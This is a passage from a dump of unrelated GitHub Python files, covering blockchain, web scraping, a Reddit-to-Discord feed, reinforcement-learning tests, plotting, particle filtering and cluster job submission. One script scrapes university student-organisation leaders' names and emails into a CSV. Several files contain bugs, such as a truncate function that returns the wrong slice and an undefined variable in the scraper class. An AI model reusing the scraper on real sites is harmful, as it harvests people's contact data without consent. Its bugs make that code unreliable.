int(arguments[1])\n except:\n print(\"input not converted to int\",end=\"\")\n print(arguments[1])\nelse:\n print(\"no arguments\")\n\n\nmax_char = 100\nminer = '0'\nchain_size = 5\n\nfirst_block = blockchain.mineTheNextBlock(max_char,miner,prev_hash=\"\")\n\nprint(\"genesis block: \",end=\"\")\nprint(first_block)\n\nlast_hash = first_block['hash_for_next_block']\ndel first_block['hash_for_next_block']\nblocklist = [first_block]\n\nfor i in range(1,chain_size+1):\n block_i = blockchain.mineTheNextBlock(max_char,miner,last_hash)\n block_i[\"Hash_%d\"%(i-1)] = last_hash\n print(block_i)\n last_hash = block_i['hash_for_next_block']\n del block_i['hash_for_next_block']\n blocklist.append(block_i)\n\nprint(\"blocklist: \")\nprint(blocklist)","repo_name":"atakkant/simple_blockchain","sub_path":"create_chain.py","file_name":"create_chain.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37109384910","text":"from selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom pathlib import Path\nimport csv\nfrom selenium.common.exceptions import TimeoutException\n\n# delete csv file if it exists\nfilename = \"emich-student-orgs.csv\"\nfileObj = Path(filename)\nif fileObj.exists():\n fileObj.unlink()\n fileObj.touch()\ncsvFile = open(filename, 'w', newline='')\n\n# prepare csv writer\nwriter = csv.DictWriter(csvFile, [\"org_name\", \"first_name\", \"last_name\", \"email\"])\nwriter.writeheader()\n\n# disable images for optimization\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference('permissions.default.image', 2)\nfirefox_profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')\n\n# set up selenium driver\ndriver = webdriver.Firefox(firefox_profile=firefox_profile)\ndriver.implicitly_wait(5) # seconds\ndriver.get(\"https://www.emich.edu/campuslife/student-orgs/getinvolved.php\")\n\nnavTable = driver.find_element_by_css_selector(\"table.osw-portals-letter-table\")\nnavButtons = navTable.find_elements_by_css_selector(\"button\")\nnavButtons = navButtons[1:]\n\norgUrls = []\n\nfor button in navButtons:\n print(button.text)\n button.click()\n linkContainers = driver.find_elements_by_css_selector(\"div.osw-portals-list-item\")\n for linkContainer in linkContainers:\n linkTag = linkContainer.find_element_by_css_selector(\"a\")\n orgUrls.append(linkTag.get_attribute(\"href\"))\n\nwait = WebDriverWait(driver, 5)\n\nfor orgUrl in orgUrls:\n print(\"processing: \" + orgUrl)\n driver.get(orgUrl)\n profileLinkTag = driver.find_element_by_css_selector(\"a[data-tab='profile']\")\n profileLinkTag.click()\n # pause execution for a second so the js can execute on the browser\n orgName = driver.find_element_by_css_selector(\"h1\").text\n\n try:\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \".form-profile a\")))\n email = driver.find_element_by_css_selector(\".form-profile a\").text\n except Exception as e:\n email = None\n\n try:\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.position-name span\")))\n fullName = driver.find_element_by_css_selector(\"div.position-name span\").text\n fullNameArray = fullName.split(\" \")\n firstName = fullNameArray[0]\n lastName = fullNameArray[-1]\n except:\n firstName = None\n lastName = None\n finalDict = {\n \"org_name\": orgName,\n \"first_name\": firstName,\n \"last_name\": lastName,\n \"email\": email\n }\n writer.writerow(finalDict)\n print(str(finalDict))\n\n\ndriver.close()","repo_name":"stelcodes/boycott-wendys-web-scraper","sub_path":"emu/emich-student-orgs.py","file_name":"emich-student-orgs.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23842392","text":"from datetime import datetime, timezone\nimport io\nimport json\nimport logging\nimport logging.handlers\nimport os\nimport sys\nimport time\nimport traceback\n\nimport discord\nimport requests\n\n\ndef setup_logging():\n \"\"\"Set up the logging module.\"\"\"\n path = os.path.dirname(os.path.abspath(__file__))\n path = os.path.join(path, \"logs\")\n\n if not os.path.exists(path):\n os.mkdir(path)\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n streamHandler = logging.StreamHandler(stream=sys.stdout)\n\n fileHandler = logging.handlers.TimedRotatingFileHandler(\n os.path.join(path, \"log.txt\"),\n when=\"midnight\",\n backupCount=7,\n encoding=\"utf-8\",\n utc=True,\n )\n\n fmt = \"{asctime} | {levelname:<8} | {name}: {message}\"\n date = \"%d.%m.%Y %H:%M:%S\"\n formatter = logging.Formatter(fmt, date, style=\"{\")\n\n for handler in (streamHandler, fileHandler):\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\ndef truncate(string, length=100):\n \"\"\"\n Truncate a string to the given length.\n\n Parameters\n ----------\n string: str\n The string to truncate.\n length: Optional[int]\n The length to trucate the string to.\n\n Returns\n -------\n str\n The truncated string.\n \"\"\"\n if len(string) <= length:\n return string\n\n return string[length - 1 :] + \"…\"\n\n\nclass DiscordRedditFeed:\n \"\"\"Sends new posts on a given subreddit through a Discord webhook.\"\"\"\n\n def __init__(self):\n self.logger = logging.getLogger(\"poster\")\n self.logger.info(\"Setting up poster.\")\n\n self._headers = {\"User-Agent\": \"DiscordRedditFeed/1.0\"}\n self._embed_colour = 0xFF4500 # Reddit brand colour.\n self._webhook_args = dict()\n self._post_webhook = None\n self._error_webhook = None\n\n @property\n def post_webhook(self):\n \"\"\"discord.Webhook: The webhook to send new posts through.\"\"\"\n if self._post_webhook is None:\n url = self.config.post_webhook\n adapter = discord.RequestsWebhookAdapter()\n\n try:\n self._post_webhook = discord.Webhook.from_url(url, adapter=adapter)\n except Exception as e:\n self.logger.exception(\"Could not create post webhook!\", exc_info=e)\n sys.exit(1)\n\n return self._post_webhook\n\n @property\n def error_webhook(self):\n \"\"\"Optional[discord.Webhook]: Webhook to send errors through.\"\"\"\n if self.config.error_webhook is None:\n return None\n\n if self._error_webhook is None:\n url = self.config.error_webhook\n adapter = discord.RequestsWebhookAdapter()\n try:\n self._error_webhook = discord.Webhook.from_url(url, adapter=adapter)\n except Exception as e:\n self.logger.exception(\"Could not create error webhook!\", exc_info=e)\n sys.exit(1)\n\n return self._error_webhook\n\n @property\n def config(self):\n \"\"\"The configuration object.\"\"\"\n return __import__(\"config\")\n\n def fetch_about(self):\n \"\"\"\n Dict[str, Any]: The about.json data of the subreddit.\n \"\"\"\n # See: https://www.reddit.com/dev/api#GET_about\n url = f\"https://www.reddit.com/r/{self.config.subreddit}/about.json\"\n resp = requests.get(url, headers=self._headers)\n\n try:\n resp.raise_for_status()\n except Exception as e:\n self.send_error(\"Could not fetch about.json!\", e)\n return None\n else:\n data = resp.json()\n return data[\"data\"]\n\n def fetch_posts(self, before=None, limit=10):\n \"\"\"\n Fetch the latest posts from the subreddit.\n\n Parameters\n ----------\n before: Optional[str]\n The fullname of the post to use as an anchor point.\n When this is not specified, posts are fetched by their\n age instead.\n limit: Optional[int]\n The maximum amount of posts to fetch. Defaults to 10.\n\n Returns\n -------\n Optional[List[Dict[str, Any]]]\n A list of post data. Returns ``None`` when an error\n occured and the list could not be fetched.\n \"\"\"\n # See: https://www.reddit.com/dev/api#GET_new\n url = f\"https://www.reddit.com/r/{self.config.subreddit}/new.json\"\n params = {\"limit\": limit}\n if before:\n params[\"before\"] = before\n \n resp = requests.get(url, headers=self._headers, params=params)\n\n try:\n resp.raise_for_status()\n except Exception as e:\n self.send_error(\"Could not fetch new.json!\", e)\n return None\n else:\n data = resp.json()\n return data[\"data\"][\"children\"]\n\n def send_post(self, data):\n \"\"\"\n Send a reddit post through the posts webhook.\n\n Parameters\n ----------\n data: Dict[str, Any]\n The post data.\n \"\"\"\n title = data[\"title\"]\n selftext = data[\"selftext\"]\n\n author = data[\"author\"]\n author_url = f\"https://www.reddit.com/user/{author}\"\n permalink = \"https://www.reddit.com\" + data[\"permalink\"]\n created_utc = datetime.fromtimestamp(data[\"created_utc\"])\n created_utc = created_utc.replace(tzinfo=timezone.utc)\n post_hint = data.get(\"post_hint\", None)\n\n is_spoiler = data[\"spoiler\"]\n is_nsfw = data[\"over_18\"]\n\n # Build the embed...\n embed = discord.Embed()\n embed.url = permalink\n embed.title = truncate(title, 256)\n embed.timestamp = created_utc\n embed.colour = self._embed_colour\n\n embed_author = f\"New post on /r/{self.config.subreddit}\"\n\n if post_hint == \"image\":\n embed_author = f\"New image post on /r/{self.config.subreddit}\"\n elif post_hint == \"link\":\n embed_author = f\"New link post on /r/{self.config.subreddit}\"\n\n embed.set_author(name=truncate(embed_author, 256), url=permalink)\n\n image = None\n\n if not (is_spoiler or is_nsfw):\n thumbnail = data[\"thumbnail\"]\n\n if post_hint == \"image\":\n image = data[\"url\"]\n elif thumbnail not in (None, \"spoiler\", \"self\"):\n image = thumbnail\n\n if image:\n embed.set_image(url=image)\n\n if selftext:\n embed.description = truncate(selftext, 2048)\n\n embed.add_field(name=\"Post Author\", value=f\"[{author}]({author_url})\")\n\n content_warnings = []\n if is_spoiler:\n content_warnings.append(\"spoiler\")\n if is_nsfw:\n content_warnings.append(\"nsfw\")\n\n if content_warnings:\n content_warning = \", \".join(content_warnings)\n else:\n content_warning = \"none\"\n\n embed.add_field(name=\"Content Warning\", value=content_warning)\n\n # ... and send it.\n self.post_webhook.send(embed=embed, **self._webhook_args)\n\n def send_error(self, message, error):\n \"\"\"\n Log an error and attempt to send it through the error webhook.\n\n Parameters\n ----------\n message: str\n The log message to include.\n error: Exception\n The error to log.\n \"\"\"\n self.logger.exception(message, exc_info=error)\n\n webhook = self.error_webhook\n if webhook is None:\n return\n\n # Build an embed for the error...\n embed = discord.Embed(title=\"Error Report\", description=message)\n embed.timestamp = datetime.datetime.utcnow()\n\n trace = traceback.format_exception(None, error, error.__traceback__)\n trace = \"\".join(trace)\n\n if len(trace) > 1024:\n shown = truncate(trace, 1024)\n else:\n shown = trace\n\n embed.add_field(name=\"Traceback\", value=f\"```\\n{shown}```\", inline=False)\n\n buffer = io.BytesIO(trace.encode(\"utf-8\"))\n file = discord.File(buffer, f\"traceback.txt\")\n\n webhook.send(embed=embed, file=file, **self._webhook_args)\n\n def run(self):\n \"\"\"\n Start fetching posts from the subreddit.\n \"\"\"\n # Set up the webhook avatar and username if enabled.\n if self.config.subreddit_username:\n self._webhook_args[\"username\"] = \"r/\" + self.config.subreddit\n\n if self.config.subreddit_avatar or self.config.subreddit_colour:\n data = self.fetch_about()\n\n if self.config.subreddit_avatar:\n icon_img = data[\"icon_img\"]\n if icon_img: # icon_img can be \"\"\n self._webhook_args[\"avatar_url\"] = icon_img\n\n if self.config.subreddit_colour:\n colour = data[\"key_color\"]\n if colour: # key_color can be \"\"\n self._embed_colour = int(colour[1:], 16)\n\n # Prepare fetch loop.\n\n # Timestamp of latest post. On Windows and Unix, this is UTC.\n # See https://docs.python.org/3/library/time.html#time.time\n created_utc = time.time()\n\n # Maximum amount of posts to fetch. 100 is the maximum.\n limit = 100\n\n # Start fetch loop.\n self.logger.info(\"Starting fetch loop.\")\n while True:\n fetch = True\n\n # Reset post cache and before.\n posts = list()\n before = None\n\n self.logger.debug(f\"Fetching posts (created_utc={created_utc}, limit={limit})\")\n while fetch:\n fetched = self.fetch_posts(before=before, limit=limit)\n if fetched is None:\n break\n\n self.logger.debug(f\"Fetched {len(fetched)} post(s).\")\n if len(fetched) == 0:\n break\n\n # Filter posts by their date, then sort oldest to newest.\n valid = [post for post in fetched if post[\"data\"][\"created_utc\"] > created_utc]\n self.logger.debug(f\"Found {len(valid)} new post(s).\")\n\n posts += valid\n posts = sorted(posts, key=lambda post: post[\"data\"][\"created_utc\"])\n\n # Fetch more relative to the oldest post if every post we\n # got was newer than our cached created_utc.\n fetch = len(valid) == len(fetched)\n\n # If we are doing another fetch, set before to the full name\n # of the oldest post we received in this fetch.\n if fetch:\n oldest = posts[0]\n before = oldest[\"data\"][\"name\"]\n\n # Send the collected posts until we are up-to-date.\n if len(posts) > 0:\n self.logger.debug(f\"Posting {len(posts)} post(s).\")\n \n for post in posts:\n try:\n self.send_post(post[\"data\"])\n except Exception as e:\n url = \"https://www.reddit.com\" + post[\"data\"][\"permalink\"]\n name = post[\"data\"][\"name\"]\n self.send_error(f\"Could not send post [{name}]({url})!\", e)\n return\n\n created_utc = max(created_utc, post[\"data\"][\"created_utc\"])\n\n # Slow down if we are sending a lot of posts. This is not\n # going to prevent an eventual 429 if you are spamming the\n # webhook with up to 100 posts. Thankfully, discord.py\n # handles the ratelimit for us.\n if len(posts) > 30:\n time.sleep(1)\n\n # Wait between fetch cycles.\n time.sleep(self.config.fetch_interval)\n\n\nif __name__ == \"__main__\":\n setup_logging()\n poster = DiscordRedditFeed()\n poster.run()\n","repo_name":"NotMaxee/Discord-Reddit-Feed","sub_path":"poster.py","file_name":"poster.py","file_ext":"py","file_size_in_byte":11785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35713525077","text":"import unittest\nfrom dqn.replay_buffer import PrioritizedReplayBuffer\n\nimport torch\nimport numpy as np\n\nclass TestPriorityReplayBuffer(unittest.TestCase):\n def test_alpha_zero_is_uniform_sampling(self):\n '''\n The premise of this test is to see if the buffer with parameter alpha=0.0\n will be reduced to uniform replay buffer. This is crucial since we are\n removing the replay buffer and instead use the prio-buffer when we need to\n use a replay buffer. The test verifies that the weights are equal to 1.0\n when alpha=0.0, therefore reducing the prio buffer to a simple, uniform\n replay buffer. \n '''\n n_batch = 64\n buffer_size = 200\n buffer = PrioritizedReplayBuffer(buffer_size=buffer_size,\n batch_size=n_batch, \n seed=101, \n n_total_steps=1000, \n alpha=0.0, \n beta_0=.4)\n nS, nA = 8, 4\n for _ in range(400):\n buffer.add(\n state=np.random.rand(nS),\n action=np.random.randint(0, nA),\n reward=np.random.rand(),\n next_state=np.random.rand(nS),\n done=np.random.randint(0, 2)\n )\n batch_indices = np.random.choice(np.arange(buffer_size), n_batch, replace=False)\n batch_priorities = np.abs(np.random.random(n_batch))\n buffer.update_priorities(\n batch_indices=batch_indices,\n batch_priorities=batch_priorities\n )\n sampled_values = buffer.sample(i_step=255)\n self.assertTrue(torch.all(sampled_values.weights.cpu().detach() == torch.ones_like(sampled_values.weights)))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"syadegari/rl_projects_udacity","sub_path":"p1_Navigation/tests/test_priority_buffer.py","file_name":"test_priority_buffer.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34502255656","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ndef compute_frac_satisfied(A: pd.DataFrame, D: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Computes the fraction of demand satisfied across all allocations\n\n Args:\n A (pd.DataFrame): Allocation DataFrame\n D (pd.DataFrame): Demand DataFrame\n\n Returns:\n pd.DataFrame: Demand satisfcation DataFrame\n \"\"\"\n return A.divide(D)\n\n\ndef compute_next_step_satisfication(df: pd.DataFrame, col: str, sat_frac=1.) -> float:\n \"\"\"Computes the fraction of time the system satisfied at least `sat_frac`\n demand after giving the user nothing the previous iteration\n\n Args:\n df (pd.DataFrame): DataFrame containing demand satisfication values\n col (str): Particular item (e.g., Apples)\n sat_frac (float, optional): Minimal demand satisfication value. Defaults to 1.\n\n Returns:\n float: Next-Step Satisfication value\n \"\"\"\n\n indices = df.index[df[col] == 0.] # Have (id, day) multi-index\n\n # Possible that no indices meet this condition therefore this measure \n # is irrelevant\n if len(indices) == 0:\n return np.nan\n\n count = 0\n last_day = max(df.index.levels[1])\n\n for idx in indices:\n # Have to check if it's the last day to avoid out-of-bound error\n if idx[1] == last_day:\n continue # By definition we cannot satisfy next day request\n else:\n frac = df[col][(idx[0], idx[1] + 1)]\n if frac >= sat_frac or np.isnan(frac):\n count += 1\n\n return count / len(indices)\n\n\ndef next_step_satisfication_by_user(df: pd.DataFrame, sat_frac: float) -> pd.DataFrame:\n \"\"\"Computes next-step satisfcation on a per-user basis\n\n Args:\n df (pd.DataFrame): DataFrame containing demand satisfication values\n sat_frac (float): Desired minimal percentage of next-step satisfcation\n\n Returns:\n pd.DataFrame: Next-Step satisfaction DataFrame on per-user basis\n \"\"\"\n\n next_step = {}\n users = df.index.levels[0] # Have multi-index with (id, day) format\n cols = df.columns\n\n for user in users:\n tmp_df = df.query('id == @user')\n vals = np.zeros(len(cols))\n for (i, col) in enumerate(cols):\n vals[i] = compute_next_step_satisfication(tmp_df, col, sat_frac)\n \n next_step[user] = np.nanmean(vals)\n\n return pd.DataFrame.from_dict(next_step, orient='index', columns=['fraction'])\n\n\ndef create_satisfaction_plot(mip_df: pd.DataFrame, greedy_df: pd.DataFrame, path: str,\n case: str):\n \"\"\"Creates bar plot showing demand satisfaction comparison between the\n MIP and greedy allocation strategy\n\n Args:\n mip_df (pd.DataFrame): MIP demand satisfaction DataFrame\n greedy_df (pd.DataFrame): Greedy demand satisfaction DataFrame\n path (str): Location to save plot\n case (str): Oracle or Learned distribution case\n \"\"\"\n mip_median = mip_df.groupby('id').mean().median(axis=1) # Id on axis=1\n greedy_median = greedy_df.groupby('id').mean().median(axis=1)\n\n index = mip_median.index\n y = np.arange(len(index))\n height = 0.35\n\n _, ax = plt.subplots(figsize=(12, 9))\n bar1 = ax.barh(y + height/2, mip_median, height, color='#beaed4', label='MIP')\n bar2 = ax.barh(y - height/2, greedy_median, height, color='#fdc086', label='Greedy')\n ax.bar_label(bar1, fmt='%.2f', padding=3, fontsize=14)\n ax.bar_label(bar2, fmt='%.2f', padding=3, fontsize=14)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.xaxis.set_visible(False)\n ax.set_yticks(y, index.tolist())\n\n if case == \"oracle\":\n title = 'Median Demand Satisfaction by Customer\\n (Oracle Knowledge)'\n else:\n title = 'Median Demand Satisfaction by Customer\\n (Learned Distributions)'\n\n ax.set_title(title, fontsize=24)\n ax.legend()\n plt.savefig(path, dpi=300, bbox_inches='tight')\n\n\ndef create_next_step_satisfaction_plot(mip_df: pd.DataFrame, \n path: str):\n \"\"\"Creates plot showing either full or partial demand satisfaction for the \n next step after getting nothing\n\n Args:\n mip_df (pd.DataFrame): MIP demand satisfaction DataFrame\n sat_frac (float): Minimal demand satisfication value\n path (str): Location to save plot\n \"\"\"\n mip_full = next_step_satisfication_by_user(mip_df, 1.)\n mip_partial = next_step_satisfication_by_user(mip_df, 0.01)\n index = mip_full.index\n y = np.arange(len(index))\n height = 0.35\n\n _, ax = plt.subplots(figsize=(12, 9))\n bar1 = ax.barh(y + height/2, mip_full.fraction, height, color='#beaed4', label='Full')\n bar2 = ax.barh(y - height/2, mip_partial.fraction, height, color='#fdc086', label='Partial')\n ax.bar_label(bar1, fmt='%.2f', padding=3, fontsize=14)\n ax.bar_label(bar2, fmt='%.2f', padding=3, fontsize=14)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.xaxis.set_visible(False)\n ax.set_yticks(y, index.tolist())\n ax.set_title('Median Next-Step Customer Satisfication', fontsize=24)\n ax.legend()\n plt.savefig(path, dpi=300, bbox_inches='tight')\n","repo_name":"HAI-lab-UVA/AI4G","sub_path":"decision/experiments/create_plots.py","file_name":"create_plots.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37869748382","text":"from datetime import datetime\nfrom sqlalchemy import VARCHAR, BigInteger, Column, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.sql import text\n\nBase = declarative_base()\n\n\nclass BaseEntity:\n id = Column('id', BigInteger, primary_key=True, autoincrement=True)\n\n createdAt = Column(\n 'created_at', DateTime, nullable=False,\n server_default=text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\")\n )\n updatedAt = Column(\n 'updated_at', DateTime, nullable=False,\n server_default=text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\"), onupdate=datetime.utcnow\n )\n\n def __repr__(self):\n return f\"{self.__class__.__name__}\"\n\n\nclass User(Base, BaseEntity):\n __tablename__ = \"user\"\n\n firstName = Column('first_name', VARCHAR(255), nullable=False)\n lastName = Column('last_name', VARCHAR(255), nullable=False)\n email = Column('email', VARCHAR(255), nullable=False)\n","repo_name":"ArsenPidhoretskyi/aws","sub_path":"service/layers/database/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37368162757","text":"# project: p3\n# submitter: zluo43\n# partner: jkang96@wisc.edu \n# hours: 10\n\n\nimport os, zipfile\n\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nfrom IPython.core.display import display, Image\n\n\n\n\n\nclass GraphScraper:\n def __init__(self):\n self.visited = set()\n self.BFSorder = []\n self.DFSorder = []\n\n\ndef go(self, node):\n raise Exception(\"must be overridden in sub classes -- don't change me here!\")\n\ndef bfs_search(self, node):\n visit = []\n todo = []\n todo.append(node)\n while todo:\n node = todo.pop(0)\n if node not in visit:\n visit.append(node)\n todo.extend(self.go(self,node))\n\n\ndef dfs_search(self, node):\n visit = []\n todo = []\n todo.append(node)\n while todo:\n node = todo.pop()\n if node not in visit:\n visit.append(node)\n todo.extend(reversed(self.go(self,node)))\n\nclass FileScraper(GraphScraper):\n def __init__(self):\n super().__init__()\n if not os.path.exists(\"Files\"):\n with zipfile.ZipFile(\"files.zip\") as zf:\n zf.extractall()\n\n def go(self, node):\n with open(\"Files/\"+node+\".txt\") as f:\n data=f.read()\n lines=data.split(\"\\n\")\n self.BFSorder.append(lines[2][-1])\n self.DFSorder.append(lines[3][-1])\n return lines[1].split(\" \")\n\nclass WebScraper(GraphScraper):\n\n def __init__(self, driver=None):\n super().__init__()\n self.driver = driver\n\n# these three can be done as groupwork\n def go(self, url):\n self.driver.get(url)\n link = self.driver.find_elements_by_tag_name(\"a\")\n\n list_dfs=self.driver.find_element_by_id(\"DFS\")\n list_dfs.click()\n self.DFSorder.append(list_dfs.text)\n\n list_bfs=self.driver.find_element_by_id(\"BFS\")\n list_bfs.click()\n self.BFSorder.append(list_bfs.text)\n\n return [link.get_attribute(\"href\") for link in links]\n\n def dfs_pass(self, start_url):\n super().__init__()\n super().dfs_search(start_url)\n return ''.join(self.DFSorder)\n\n def bfs_pass(self, start_url):\n super().__init__()\n super().bfs_search(start_url)\n return ''.join(self.BFSorder)\n\n\n","repo_name":"zluo43/cs320_project3","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72438187640","text":"from numpy import zeros, exp, log, sum, pi, cumsum \n\n\ndef smc(init, logl, evol, resa, T, y, N):\n \"\"\"\n run a 1D filter particle on an horizon [1,T]\n with N particles and observed data\n\n Inputs:\n init ~ initial state density \n logl ~ log likelihood function : (y, x) -> log P(y | x)\n evol ~ evolution function x[t] -> x[t+1]\n resa ~ resample function\n T ~ final time (integer)\n y ~ vector of observed data\n N ~ number of particles (integer)\n \n Output\n \n x ~ state space matrix \n w ~ weigths matrix \n ess ~ ess vector\n log_z ~ marginal log likelihood\n\n \"\"\"\n \n x = zeros((N, T))\n log_w = zeros((N, T))\n w = zeros((N, T))\n ess = zeros(T)\n \n # init \n x[:, 0] = init(N)\n \n # calcul des poids\n log_w[:, 0] = logl(y[0], x[:, 0])\n w[:, 0] = exp(log_w[:, 0])\n \n # et normalisation \n w_sum = sum(w[:, 0])\n w[:, 0] /= w_sum\n log_w[:, 0] -= log(w_sum)\n\n # log vraisemblance marginale\n log_z = log(w_sum)\n\n # effective sample size\n ess[0] = 1. / sum(w[:, 0]**2)\n\n # iterations\n for t in range(1, T):\n x[:, t - 1] = resample(w[:, t - 1], x[:, t - 1])\n log_w[:, t - 1] = -log(N)\n w[:, t - 1] = 1./ N\n\n # mutation\n x[:, t] = evol(x[:, t - 1])\n\n # weights computation\n log_w[:, t] = log_w [:, t - 1] + logl(y[t], x[:, t])\n w[:, t] = exp(log_w[:, t])\n\n # normalization\n w_sum = sum(w[:, t])\n w[:, t] /= w_sum\n log_w[:, t] -= log(w_sum)\n\n #marginal log likelihood\n log_z += log(w_sum)\n\n ess[t] = 1./ sum(w[:, t]**2)\n \n return x, w, ess, log_z\n\n\n# example of parameters\nfrom numpy.random import randn, rand\n\n# initial state \nmu_1 = 0\nsigma_1 = 1\ninit = lambda N : mu_1 + sigma_1 * randn(N)\n\n# evolution\nsigma_u = 1\nevol = lambda x : x+ sigma_u * randn()\n\n# simulate a measure\nsigma_v = 1\nmeasure = lambda x : x + sigma_v * randn()\n\n# logl\nlogl = lambda x, y : -0.5 * log( 2 * pi) - log(sigma_v) - 0.5 * ((y - x)/sigma_v)**2\n\n# genere data\ndef gen_data(T):\n x = zeros(T)\n y = zeros(T)\n x[0] = init(1)\n y[1] = measure(x[1])\n for t in range(1, T):\n x[t] = evol(x[t-1])\n y[t] = measure(x[t])\n return x,y\n\n# resample\ndef resample(w, x):\n u = rand(w.shape[0])\n # indexes from parent particles\n idx = sum(u[None, :]>cumsum(w)[:, None], 0)\n #import pdb; pdb.set_trace()\n return x[idx]\n\nt_final = 20\nN = 10000\nx, y = gen_data(t_final)\nimport time\ntic = time.time()\nx_smc, w, ess, log_z = smc(init, logl, evol, resample, t_final, y, N)\ntoc = time.time() -tic\nprint (\"tps smc = %fs\" % toc)\n#x_pf_mean = sum(x_smc * w, 0)\n#x_pf_sd = sqrt(sum( x_smc **2 * w, 0) - x_pf_mean**2)\n#it=mgrid[0.:t_final]\n#plot(it, x_pf_mean, '-', it, x_pf_mean - 1.96 * x_pf_sd, '-', \n# it, x_pf_mean + 1.96 * x_pf_sd, '-', it, x, '-')\n","repo_name":"aitzkora/bazarD","sub_path":"smc/smc.py","file_name":"smc.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9883243847","text":"#### Geometry file (.xml file), unit cell information (.cif file) and scattering kernels file (name-scatterer.xml file) which defines the scattering formula or diffraction peaks\n\nimport os,sys, numpy as np\nthisdir = os.path.abspath(os.path.dirname(__file__))\nif thisdir not in sys.path:\n sys.path.insert(0, thisdir)\n\ntemplate = \"\"\"\n\n \n\n {sample_blocks} \n\n \n {geom_regs} \n \n\n \n\n\n\"\"\"\ndef shape_file_entry(shape_name, shape_fileName):\n return \"\"\" \n\"\"\".format(shape_name=shape_name, shape_fileName=shape_fileName)\n\n\ndef sample_block(name, shape_name, formula, strutureFiletype):\n return \"\"\" \n \n &{shape_name};\n \n \n {formula}\n <{strutureFiletype}file>{formula}.{strutureFiletype}\n \n \n\"\"\".format(name=name, shape_name=shape_name, formula=formula, strutureFiletype=strutureFiletype)\n\nscatterers = {\n ('outer-body', 'shapeAl', 'outer-body-geom', 'Al', 'xyz'), # (name, shape_name, geometry file name, formula)\n ('inner-sleeve', 'shapeCu', 'inner-sleeve-geom', 'Cu', 'xyz'),\n ('sample', 'shapeSample', 'sample_geom', 'Si', 'xyz'),\n ('collimator', 'shapeColl','coll_geometry', 'B4C', 'cif'),\n}\n\ndef makeSAXML(sampleassembly_fileName, scatterers=scatterers):\n\n shape_file_entries = [shape_file_entry(shape_name, shape_fileName) for name, shape_name, shape_fileName, formula,strutureFiletype in scatterers]\n shape_file_entries='\\n'.join(shape_file_entries)\n sample_blocks = [sample_block(name, shape_name, formula,strutureFiletype) for name, shape_name, shape_fileName, formula,strutureFiletype in scatterers]\n sample_blocks = '\\n'.join(sample_blocks)\n lines = ['' .format(name) for name, shape_name, shape_fileName, formula,strutureFiletype in scatterers]\n geom_regs = '\\n '.join(lines)\n text = template.format(shape_file_entries=shape_file_entries, sample_blocks=sample_blocks, geom_regs=geom_regs)\n with open(os.path.join(thisdir, '../sample/sampleassembly_{}.xml'.format(sampleassembly_fileName)), \"w\") as sam_new:\n sam_new.write(text)\n # return(sampleassembly_fileName)\n return()\n\n\n\n\n\n\n","repo_name":"Fahima-Islam/c3dp","sub_path":"c3dp/sampleassembly_program.py","file_name":"sampleassembly_program.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11448514430","text":"#!/usr/bin/env python3\n#\n# Ed Mountjoy\n#\n# Script adapted from: https://github.com/slowkow/snakefiles/blob/master/bsub.py\n#\n# bsub.py\n#\n# This script checks a Snakemake job\"s properties (threads, resources) and chooses\n# an appropriate LSF queue that meets the requirements. It also automatically\n# chooses the queue that is least busy unless you already specified a queue.\n#\n# Usage\n# -----\n#\n# Add \"threads\" and \"resources\" to your resource-intensive rules:\n#\n# rule my_rule:\n# input: ...\n# output ...\n# threads: 4\n# resources:\n# mem=8000, # megabytes\n# runtime=35, # minutes\n# queue=\"my_favorite_queue\" # queue name\n#\n# Invoke snakemake with the path to bsub.py:\n#\n# snakemake --jobs 999 --cluster \"path/to/bsub.py -o bsub.stdout\"\n#\n# Consider adding bsub.py to a folder in your $PATH, so you can do:\n#\n# snakemake --jobs 999 --cluster \"bsub.py -o bsub.stdout\"\n\n\n\nimport os\nimport sys\nimport json\nimport argparse\nimport time\n\nfrom subprocess import check_output\n\nfrom snakemake.utils import read_job_properties\n\ndef main():\n\n # Parse command line\n parser = 